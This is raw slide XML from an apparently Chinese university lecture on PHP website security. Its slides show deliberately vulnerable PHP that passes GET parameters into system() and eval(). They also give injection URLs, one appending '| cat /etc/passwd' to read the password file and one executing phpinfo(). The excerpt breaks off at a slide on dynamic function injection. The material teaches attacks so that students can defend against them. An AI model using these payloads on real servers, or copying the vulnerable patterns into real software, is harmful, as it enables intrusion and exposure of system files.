        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="3962400" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="4572000" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="5181600" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>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3/23/2017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0"/>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0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr txBox="1"/>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0"/>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0"/>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0"/>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0"/>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0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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ftr="0" dt="0"/>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2017/03/23</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FE6A3721-9BF6-4181-8215-E505A3BBED3F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="软院logo横版.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5" r:id="rId1"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="5865" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="304800" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1335"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="3735" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="914400" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="3200" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1524000" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2665" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="2133600" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2743200" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="3352800" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="3962400" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="4572000" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="5181600" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>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3/23/2017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0"/>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0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr txBox="1"/>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0"/>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0"/>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0"/>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0"/>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0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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hdr="0" ftr="0" dt="0"/>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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9.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tags" Target="../tags/tag22.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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 Target="slide1.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slideLayout" Target="../slideLayouts/slideLayout9.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0" y="3560960"/>
            <a:ext cx="12192000" cy="989711"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="97500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>讲  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网站安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="内容占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2599871" y="2459301"/>
            <a:ext cx="7175500" cy="731329"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>高性能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开发之</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0">
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>上传文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>ex1.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0">
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>$dir = $_GET["dir"];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>	if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>($dir))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>	{</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>       	 echo "&lt;pre&gt;";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>        	system("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
              <a:t> -al ".$dir);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>        	echo "&lt;/pre&gt;";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0">
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>http://www.sectop.com/ex1.php?dir=| cat /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0">
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>命令变成了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -al | cat /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数将输入的字符串参数当作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>程序代码来执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>上传文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ex2.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>($_GET["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"]))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>        $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = $_GET["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>("\$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>        echo "\$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> =".$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> http://www.xxx.com/ex2.php?arg=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>动态函数的注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
